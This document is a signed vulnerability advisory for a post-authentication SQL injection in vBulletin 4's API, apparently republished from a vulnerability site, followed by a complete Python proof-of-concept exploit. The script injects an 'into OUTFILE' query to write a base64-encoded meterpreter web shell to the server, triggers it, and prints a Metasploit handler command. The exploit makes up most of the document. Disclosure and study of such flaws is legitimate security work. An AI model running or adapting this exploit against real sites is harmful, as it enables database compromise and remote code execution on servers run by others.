-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CVE-2014-2022 - vbulletin 4.x - SQLi in breadcrumbs via xmlrpc API
(post-auth)
============================================================================
==
Overview
- --------
date : 10/12/2014
cvss : 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C) base
cwe : 89
vendor : vBulletin Solutions
product : vBulletin 4
versions affected : latest 4.x (to date); verified <= 4.2.2
* vBulletin 4.2.2 (verified)
* vBulletin 4.2.1 (verified)
* vBulletin 4.2.0 PL2 (verified)
exploitability :
* remotely exploitable
* requires authentication (apikey)
patch availability (to date) : None
Abstract
- ---------
vBulletin 4 does not properly sanitize parameters to breadcrumbs_create
allowing
an attacker to inject arbitrary SQL commands (SELECT).
risk: rather low - due to the fact that you the api key is required
you can probably use CVE-2014-2023 to obtain the api key
Details
- --------
vulnerable component:
./includes/api/4/breadcrumbs_create.php
vulnerable argument:
conceptid
which is sanitized as TYPE_STRING which does not prevent SQL injections.
Proof of Concept (PoC)
- ----------------------
see https://github.com/tintinweb/pub/cve-2013-2022
1) prerequesites
1.1) enable API, generate API-key
logon to AdminCP
goto "vBulletin API"->"API-Key" and enable the API interface,
generate key
2) run PoC
edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL)
provide WWW_DIR which is the place to write the php_shell to (mysql
must have permissions for that folder)
Note: meterpreter_bind_tcp is not provided
run PoC, wait for SUCCESS! message
Note: poc will trigger meterpreter shell
meterpreter PoC scenario requires the mysql user to have write
permissions
which may not be the case in some default installations.
Timeline
- --------
2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure
Contact
- --------
tintinweb - https://github.com/tintinweb/pub/cve-2013-2022
(0x721427D8)
-----BEGIN PGP SIGNATURE-----
iQIcBAEBAgAGBQJUPDhLAAoJEBgB43t1YjbLFOwP/Alc3Rb4c+1l4efPQrZhO96r
Vx+YtClXEXjGeSphZddFegVh/WlY8HQioepmMO9pwz3ehl00pGEu7N2qAILoO2pA
DZ8Lj89WZiXDkDAI56RTjDsxnf8BgxWTBZn4HO2kQtziPV9adsm7bN+fBN0Pn0D6
uTm5fM3Sd6x4NZyt6moi3oImHeTCd+KxDokBskPLT7i7fUPmyMDkv8a564DZyjz3
iCp9ZfjKEF/O2+r+UOgbtr8jyqcfosVIgn9ldJmKMut04hOC5Q6a4GnivyCbGS+E
B/pkiqSWQDbCThQcfTS+3vRubH3N2V3Y3I2VnnCdosK4VnrlVIiekHxfOyCyXxJZ
HjNxptG6WvSv3/cywb/FyEY114AArYpfBdb8rJs/DniQJ7soCMMFaYVPO/LpdRV/
4xC5Rj/g5ud59dDUtCT62+tmzfKt5Lh+/wmBRliCU9EEzRqcpUdh1xn/BDy2XzlP
6PFvQpTLAmzGXP4X+QkPr+iIvGvPCuu9BjHiFuEeHItaXc0tFTjKkohI0Iv1Yjvg
PhGkGXuEuBBwg3Cec/NT/5+1Jj2RahvFC6EMAXKPu2X3n/SeBRDqqurNL8LgkZIR
ycCVO04yGDns5ikpFGHMqXBH1uvCB5OQVDtVvVLQZOxC7JLd4cA/AmvltDwVeb7u
GZhJijkeC0vpRxM+kcTY
=BhWu
-----END PGP SIGNATURE-----
Proof of concept:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, cookielib, urllib, json, hashlib
class Exploit(object):
baseurl = None
cookies = None
def __init__(self,baseurl,params, debuglevel=1):
self.cookies = cookielib.LWPCookieJar()
handlers = [
urllib2.HTTPHandler(debuglevel=debuglevel),
urllib2.HTTPSHandler(debuglevel=debuglevel),
urllib2.HTTPCookieProcessor(self.cookies)
]
self.browser = urllib2.build_opener(*handlers)
self.baseurl=baseurl
self.params = params
def call(self,path="",data={}):
assert(isinstance(data,dict))
data = urllib.urlencode(data)
req = urllib2.Request("%s%s"%(self.baseurl,path),data)
req.add_header("Content-Type", "application/x-www-form-urlencoded")
return self.browser.open(req)
def call_json(self,path=None,data={}):
try:
x=self.call(path,data).read()
print "raw_response", x
resp = json.loads(x)
except urllib2.HTTPError, he:
resp = he.read()
return resp
def vb_init_api(self):
params = {'api_m':'api_init'}
params.update(self.params)
data = self.call_json("?%s"%(urllib.urlencode(params)))
self.session = data
return data
def vb_call(self, params):
api_sig = self._vb_build_api_sig(params)
req_params = self._vb_build_regstring(api_sig)
params.update(req_params)
data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
if not isinstance(data, dict):
return data
if 'errormessage' in data['response'].keys():
raise Exception(data)
return data
def _ksort(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( "%s=%s"%(key,value))
return "&".join(ret)
def _ksort_urlencode(self, d):
ret = []
for key, value in [(k,d[k]) for k in sorted(d.keys())]:
ret.append( urllib.urlencode({key:value}))
return "&".join(ret)
def _vb_build_api_sig(self, params):
apikey = self.params['apikey']
login_string = self._ksort_urlencode(params)
access_token = str(self.session['apiaccesstoken'])
client_id = str(self.session['apiclientid'])
secret = str(self.session['secret'])
return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()
def _vb_build_regstring(self, api_sig):
params = {
'api_c':self.session['apiclientid'],
'api_s':self.session['apiaccesstoken'],
'api_sig':api_sig,
'api_v':self.session['apiversion'],
}
return params
if __name__=="__main__":
TARGET = "http://192.168.220.131/vbb4/api.php"
APIKEY = "4FAVcRDc"
REMOTE_SHELL_PATH = "/var/www/myShell.php"
TRIGGER_URL = "http://192.168.220.131/myShell.php"
DEBUGLEVEL = 0 # 1 to enable request tracking
### 2. sqli - simple - write outfile
print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php"
params = {'clientname':'fancy_exploit_client',
'clientversion':'1.0',
'platformname':'exploit',
'platformversion':'1.5',
'uniqueid':'1234',
'apikey':APIKEY}
x = Exploit(baseurl=TARGET,params=params)
vars = x.vb_init_api()
print vars
'''
x.vb_call(params={'api_m':'breadcrumbs_create',
'type':'t',
#'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH,
'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH)
})
print "[ *] SUCCESS! - created file %s"%TRIGGER_URL
'''
### 3. sqli - put meterpreter shell and trigger it
print "[ 3 ] - sqli - meterpreter shell + trigger"
with open("./meterpreter_bind_tcp") as f:
shell = f.read()
shell = shell.replace("<?php","").replace("?>","") #cleanup tags
shell = shell.encode("base64").replace("\n","") #encode payload
shell = "<?php eval(base64_decode('%s')); ?>"%shell # add decoderstub
shell = "0x"+shell.encode("hex") # for mysql outfile
x.vb_call(params={'api_m':'breadcrumbs_create',
'type':'t',
'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)})
print "[ *] SUCCESS! - triggering shell .. (script should not exit)"
print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST=<TARGET_IP> E"
print "[ *] shell active ... waiting for it to die ..."
print urllib2.urlopen(TRIGGER_URL)
print "[ ] shell died!"
print "-- quit --"
<p>
Vulmon